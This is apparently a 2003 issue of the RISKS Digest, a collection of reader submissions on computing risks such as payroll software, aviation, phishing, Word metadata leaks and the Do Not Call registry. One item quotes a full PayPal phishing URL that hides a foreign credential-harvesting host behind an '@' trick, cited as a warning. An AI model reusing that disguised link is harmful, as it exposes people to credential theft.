Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
The German government has a little problem. Up until now all of the civil servants have been paid according to a pay scale that is the same throughout Germany. The salaries are paid out by the states, but the federal government determines the pay level. The company SAP has developed payroll software for the civil service that many states in German use. When a new payscale goes into effect, they just issue a table update, and everything is fine. Now suddenly the states are rebelling: Berlin has left the fold, and just this week concocted a wacky payment system. Certain extras are being cut, others kept, pay is being cut either 8, 10 or 12 percent depending on what scale people are in, the work week is to be decreased by 2 hours a week for most of them, etc. etc. No one really understands it, except that Berlin is broke and is trying to save money any way it can. The changes are to go into effect immediately - except that there's the slight problem with the payroll system. It assumes the same tariffs as everywhere..... Looks like the folks down at SAP are going to have their vacations canceled, as they try to whip up programs to institute this payment schedule change. Or as a colleague once said many, many years ago: No one can be *that* crazy.... only to discover a few months later that there really was someone with a really crazy schema for organizing stuff. Prof. Dr. Debora Weber-Wulff, FHTW Berlin, FB 4, Internationale Medieninformatik Treskowallee 8, 10313 Berlin +49-30-5019-2320
Avweb Newswire (http://www.avweb.com/newswire/9_27b/complete/185253-1.html): "In Europe last week, French fighter jets almost shot down a civilian helicopter that wandered over Lake Geneva, after a Swiss controller jokingly labelled the helicopter as 'al-Qaeda' on his radar screen." Ian Chard RHCE Unix systems administrator E: ichard@cadence.com European IT, Cadence Design Systems Ltd T: +44 (0)1506 595019 The Alba Campus, Livingston, Scotland EH54 7HH M: +44 (0)7901 855073
Article in *NewScientist* about an interesting new technique for keeping airliners from crashing into skyscrapers: http://www.newscientist.com/news/news.jsp?id=ns99993893 The proposal suggests modifying the avionics in aircraft so that the plane would fight any efforts by the pilot to fly into restricted airspace. So if a plane was flying with a no-fly-zone to the left, and the pilot started banking left to enter the zone, the avionics would counter by banking right. Lee's system, called "soft walls", would first gently resist the pilot, and then become increasingly forceful until it prevailed. The risks of this technique I leave as an exercise to the reader. Chris Meadows aka Robotech_Master robotech@eyrie.org http://www.eyrie.org/~robotech
Edward Lee, at U.C. Berkeley, is proposing to implement no-fly zones around skyscrapers (and avoid a repeat of the 9/11 massacre) by using GPS to override the controls of civilian aircraft. Based on a database (in the aircraft) of building locations, the on-board avionics would force the controls of large airplanes to prevent them from flying into large buildings (with presumably known locations). There's an interesting article in this week's New Scientist (http://www.newscientist.com/news/news.jsp?id=ns99993893) that talks about Lee's system and relates it to other ideas for counter- terrorism. Interestingly, one advantage that Lee uses is that other systems require radio links with the ground and therefore "can be jammed, or hacked into" (while, presumably, GPS cannot?). Not surprisingly, Lee says that pilots are "openly hostile" to the idea. It seems to me that the system falls prey to a weakness that so many pseudo-security systems do: it's in essence a cooperative system, rather than a pre-emptive one (by analogy to multitasking in the computing world). Even assuming the avionics work flawlessly, it would be impossible to install the "soft wall" system on every airplane in the country, let alone the world — and it only takes one airplane with the soft-wall avionics missing or disabled, to defeat the purpose of the whole system.
The Wall Street Journal today (7/3/03) reported that a mistaken order on the Chicago Board of Trade's "e-mini Dow Jones Industrial Average Futures" caused wild market swings today. Apparently an order to sell 10,000 contracts instead of 100 was put in by mistake. This caused the market, which had been on the upswing that day, to plunge downwards in both the Chicago Board of Trade and the Chicago Mercantile Exchange. Several traders reported assuming that some bad news such as a terrorist attack had sparked the sell-off. The RISK of a typo on an electronic system causing financial havoc is once again made clear. Conrad Heiney conrad@fringehead.org http://fringehead.org
$180 million at $500 a month, Vickie Chachere, Associated Press, 28 Jun 2003 A man who schemed to steal satellite television signals now has something much bigger than a cable bill to pay — a whopping $180 million restitution order on which he is to make $500 monthly payments. http://www.orlandosentinel.com/news/orl-locpayback28062803jun28,0,5719929.story http://yro.slashdot.org/yro/03/06/28/181227.shtml
From today's *Melbourne Age*: According to reports on local radio this morning, the lady in question was in possession of a branded boarding pass which clearly identified her carrier as Cathay Pacific not Qantas. One has to question our reliance on technology when even holding a branded boarding pass, a passenger can inadvertently walk onto the wrong flight and end up not only in a different country, but a different hemisphere to boot! http://www.theage.com.au/articles/2003/07/08/1057430177680.html
In a NY Times story about the effects of NY City budget cuts: http://www.nytimes.com/2003/07/07/nyregion/07BLOC.html?pagewanted=print (link free until July 13 or so, after that they charge): Is a discussion of yet another multi-million dollar software development failure: Eight years ago, at the urging of [...] funeral directors, the city agreed to develop a computerized registration system [for the filing of death certificates]. About $3.2 million was spent to design one, according to an audit released on June 23 by the city comptroller. Then the plans were abandoned when the prototype system developed serious problems, like registering some men as having been pregnant when they died. The city now plans to spend $1.8 million more for project design. The comptroller's audit called the aborted plans "a monumental waste" of taxpayer dollars. The NYC Comptroller's press release announcing the audit is at: http://www.comptroller.nyc.gov/press/2001_releases/01-08-055.shtm Where it is mentioned that the city Health Department, in charge of the software development, violated both City and State procurement procedures in using an existing contract with IBM for "computer maintenance" to develop the new software system. The full bill for the system so far is more like $9-$10 million. The system still does not work, and the Health Department has issued a new RFP for the project that does not contain any references to the old system, so it appears they intend to throw it away. The audit is available at: http://www.comptroller.nyc.gov/bureaus/audit/06-23-03_7A03-073.shtm The Comptroller quickly reaches to the heart of the matter: "[...] the Department did not employ a formal systems development methodology or an independent software quality assurance consultant [as required by City rules, which] contributed to the apparent failure of this project." Meanwhile, across the river in New Jersey, a similar project was completed by leveraging an existing Sybase system from the New York State Department of Health, taking only six months and $250,000.
http://www.washingtonpost.com/wp-dyn/articles/A33576-2003Jun25.html Although this article is focusing more on the local Prince George's County police force and detective function — which has gotten a lot of bad press here in the DC area for quite a long time — I think the message that is being missed is that technology can give the exact opposite result from that intended. Photographs from ATM cameras linked with ATM card usage and the system clocks are supposed to provide exact measures of events. However, if the ones using the data do not carefully collect it and interpret it correctly, then — as this article states — three apparently innocent people are arrested and held for 22 days. Humans cannot be completely removed from processes that have severe consequences, but the humans that are left "in the loop" must understand that what they do has severe consequences. They should, therefore, be very careful about what the "system" is telling them. In this case, the detention of the three innocent people has allowed a killer at least 22 days to get away.
CASPIAN asks, "How can we trust these people with our personal data?" CASPIAN (Consumers Against Supermarket Privacy Invasion and Numbering) says anyone can download revealing documents labeled "confidential" from the home page of the MIT Auto-ID Center Web site in two mouse clicks. The Auto-ID Center is the organization entrusted with developing a global Internet infrastructure for radio frequency identification (RFID). Their plans are to tag all the objects manufactured on the planet with RFID chips and track them via the Internet. Privacy advocates are alarmed about the Center's plans because RFID technology could enable businesses to collect an unprecedented amount of information about consumers' possessions and physical movements. They point out that consumers might not even know they're being surveilled since tiny RFID chips can be embedded in plastic, sewn into the seams of garments, or otherwise hidden. ... http://www.nocards.org/press/pressrelease07-07-03_1.shtml
Hiawatha Bray, *The Boston Globe*, 4 Jul 2003 Annoyed by the prospect of a massive new federal surveillance system, two researchers at the Massachusetts Institute of Technology are celebrating the Fourth of July with a new Internet service that will let citizens create dossiers on government officials. The system will start by offering standard background information on politicians, but then go one bold step further, by asking Internet users to submit their own intelligence reports on government officials — reports that will be published with no effort to verify their accuracy. ''It's sort of a citizen's intelligence agency,'' said Chris Csikszentmihalyi, assistant professor at the MIT Media Lab. He and graduate student Ryan McKinley created the Government Information Awareness (GIA) project as a response to the US government's Total Information Awareness program (TIA). ... http://www.boston.com/dailyglobe2/185/business/ Website_turns_tables_on_government_officials+.shtml
Bob Tedeschi, *The New York Times*, 30 Jun 2003 What started more than a year ago as a California teenager's quest for blue jeans ended this month with a warning shot from the Federal Trade Commission, which is moving more aggressively against e-tailers seen as too lax about protecting their customers' privacy. Online merchants say they can handle the commission's new scrutiny. But some people, including the young man who set off the FTC investigation in this case, are not so sure. And given that the young man pointed out a security flaw in another well-known online merchant last week, he may be right. In February 2002, Jeremiah Jacks, then a 19-year-old computer programmer, was set to buy a pair of jeans on the Web site of Guess Inc. But before entering his credit card information, he took the unusual step of checking the site's security - not the security pledge in Guess.com's privacy policy, but the company's actual practices. In the site's address bar he entered a string of characters that, on an insecure site, would produce a page listing the credit card numbers of the company's customers. The vulnerability, he said, is well known within the programming community. It worked. About 200,000 customer names and credit card numbers appeared in Mr. Jacks's browser. In an interview last week, Mr. Jacks recalled that he had immediately tried to inform Guess of its vulnerability to such a break-in [an SQL injection]. Guess.com ignored his entreaties, he said, and Mr. Jacks soon reported his discovery to SecurityFocus, an Internet security news site owned by the Symantec Corporation, which then notified Guess. Within hours, the company fixed the site. http://www.nytimes.com/2003/06/30/technology/30ECOM.html
Anonymous organizers of a Web-vandalizing contest this weekend say that the goal will be to deface 6,000 Web sites in six hours, with winners to be awarded prizes such as Web hosting space and Internet domain names. Pete Allor of Internet Security Systems Inc., which runs a threat-detection service, cautions Web operators: "The problem is now, and you shouldn't wait until Sunday to address it." (Atlanta Journal-Constitution 3 Jul 2003) http://www.ajc.com/business/content/business/0703/03hacker.html NewsScan Daily, 3 Jul 2003 [Apparently mostly small sites were hit. PGN]
Knowing which location register (cell-phone networks use, essentially,
remote procedure call with callbacks between "location registers" to
authorize outbound calls, correctly route inbound calls, etc.) a phone is
currently active on, or has recently been active on, is *not* the same as
knowing where a phone is with GPS precision, nor even the same as knowing
which cell site a phone is currently speaking to. Logs of transitions
between LRs ("roaming", even if that hardly exists from most customers'
points of view any longer) are useful and probably even necessary for
diagnosing connectivity and billing problems and for settling accounts among
providers.
Microsoft Word documents are notorious for containing private information in file headers which people would sometimes rather not share. The British government of Tony Blair just learned this lesson the hard way. Last week, Alastair Campbell, Blair's Director of Communications and Strategy, was in the hot seat in British Parliament hearings explaining what roles four of his employees played in the creation of a plagiarized dossier on Iraq which the UK government published in February 2003. The names of these four employees were found hidden inside of a Microsoft Word file of the Iraq dossier which was posted on the 10 Downing Street Web site for use by the press. The "dodgy dossier" as it became known in the British press raised serious questions about the quality of British intelligence before the second Iraq war. I wrote an article for my Web site about how a bit computer forensics Analysis played a role in this controversy: http://www.ComputerBytesMan.com/privacy/blair.htm Richard M. Smith http://www.ComputerBytesMan.com
The British government learned the hard way about how Microsoft Word documents keep a revision history: http://www.wsws.org/articles/2003/feb2003/cnew-f10.shtml http://www.computerbytesman.com/privacy/blair.htm http://www.abc.net.au/pm/s779254.htm The original analysis was supposedly this: http://www.casi.org.uk/discuss/2003/msg00457.html This is nothing new of course: see RISKS 20.83, 20.28, 17.76, 19.97, 18.46, 18.44, 18.41, etc. This problem goes back to (at least) 1996 (RISKS 17.76) and yet people are still bitten by this bug(?). The more things change... David Magda <dmagda at ee.ryerson.ca>, http://www.magda.ca/
I don't know exactly what it is about PayPal (as compared with any other e-commerce sort of thing)...I seem to get more scam e-mails targeting them than anything else, and all of these e-mails seem to look very similar. They all appear to be from PayPal, and include HTML forms with legitimate PayPal images and have links with real PayPal URL's. The kicker is always that the submit button takes you to a non-PayPal site. The newest variant is a bit more insidious than the previous ones I've received. The submit button, as usual, takes you to a non-PayPal site, but appears to immediately re-direct you to a valid PayPal page. You have to either be looking in the page source for the non-PayPal URL or be *very* quick to notice that you are going to a non-PayPal URL, first. And even the non-PayPal URL might be a little hard for a naive user to catch, assuming they were fast enough to see it: http://www.paypal.com0011101100011010011100011100001110001101001110001110000111000110100111000111000011100011@pizdatohosting.com/paypal/paypal.php
It is worth noting that the computerized voting system used by the Israeli Knesset has, as far as I know, no security whatsoever. It consists solely of a station of buttons at each Member of Knesset's (MK's) seat for him/her to use to register his/her vote. No authentication is required for casting a vote. All an MK has to do to cast someone else's vote is to lean over and push the desired button at the other MK's station. In contrast, the electronic voting stations in the US House of Representatives require a "Vote-ID" card to be inserted before a Congressman can vote. Furthermore, there are many fewer stations than seats (Congressman line up to vote at the stations), so I suspect that the stations all have cameras trained on them throughout each vote, such that if there is suspicion of wrong-doing after a vote, it is straightforward to replay the video to find out who voted twice. The US Senate has no electronic voting equipment — counted votes are conducted by roll-call or paper ballot. This is surely far from the first time that MK's have voted for each other. In fact, I find myself wondering not how this could be allowed to happen, but rather why a fuss is being made about this particular instance of it. If the Knesset really wanted to prevent it, they could do so, so it seems to me that they haven't seen it as a problem. Perhaps the culture within Israel's government is changing, such that what was previously acceptable behavior is becoming unacceptable.
RISKS has previously pointed out the awkwardness that can result from inadvertently tapping an auto-dial button on a cellphone. We now have a burgler who will now have quite a bit of spare time to study RISKS. Per the *NY Post* article, excerpts attached: "It seems Boylan accidentally hit the redial button on his cell phone during a burglary - providing the break-in victim with a voice-mail recording of the crime in progress, said Detective Lt. Steve Skrynecki. "Before the 3:20 a.m. burglary on Sunday, Boylan had called the victim's girlfriend on her cell and spoke to the victim, the detective said. "Somehow, Boylan "inadvertently hit the redial on his cell phone" while he and his buddy ransacked the house and chatted as they grabbed a video-game player, game cartridges, a remote-controlled car and an antique bayonet, Skrynecki said. "They had no idea their crime-scene commentary was being recorded on the girlfriend's voice mail, Skrynecki said. http://nypost.com/news/regionalnews/2178.htm
Nearly one-fourth of the consumers who tried to sign up for the Federal Trade Commission's Do Not Call database haven't completed the process, the agency said Monday. The agency blames in part a series of technological glitches, including aggressive spam filtering by e-mail providers that accidentally deleted some confirmation e-mails sent by the FTC. But many consumers just haven't replied to the FTC e-mail, which is the final step in the sign-up process, said FTC attorney Eileen Harrington. [Source: Bob Sullivan, Three million consumers didn't finish sign-up process, MSNBC, 30 Jun 2003] http://www.msnbc.com/news/933138.asp
I found my way to the Web site for the national Do Not Call registry, through the CDT Web site. With great cheerfulness, I registered my two phone numbers. I followed the instructions: I entered my phone numbers and one of my e-mail addresses. I received the automatic e-mails generated by the registry Web site, and followed their instructions, which were simply to click on a link in the e-mail and print out the confirmation on the linked Web page. "How simple!" thought I to myself. "What a blessing! With no effort at all, I am relieved of countless nuisance calls that interrupt my otherwise hectic dinner!" "But wait a bit! How does it know that the e-mail address I entered corresponds to someone who legitimately has the rights to put my number on the Do Not Call registry? Oh well...I guess it doesn't matter...suppose I go out of my way to take someone else off the list...are they going to cry because they don't get a lot of telemarketing calls? I guess not. No problem!" "Oh, but wait...I think I saw a 'delete registration' button..." Yup. It works the same way. Type in a phone number and your favorite e-mail address, and you can make sure that that number is not on the do not call registry!
Like many other people, I registered at www.donotcall.gov the other day. It seems like they are using a "validation" technique that is often used for e-mail lists: contact the e-mail given to see if it really belongs to the person trying to subscribe. Alas, this does no good when you contact an e-mail to validate a phone number.
Assume for a moment, that do not call/do not spam lists are found to be invalid/unenforceable/unconstitutional. 'They', now, have all the valid e-mail addresses and phone numbers anyone could want.
What are the RISKs of a do-not-call (or do-not-e-mail) list? How does this process work? Does a telemarketer purchase a copy of the do-not-call list, or does the telemarketer submit his own copy and get back a list of rejections? Since conducting surveys is apparently still allowed under the new law, will telemarketers use the do-not-call list but employ a pseudo-survey marketing tactic? Or will the free market dictate that calling the unwilling is not a money-making proposition? Or is the list seeded with honey pots to facilitate catching violators? I find myself afraid to sign up.
Please report problems with the web pages to the maintainer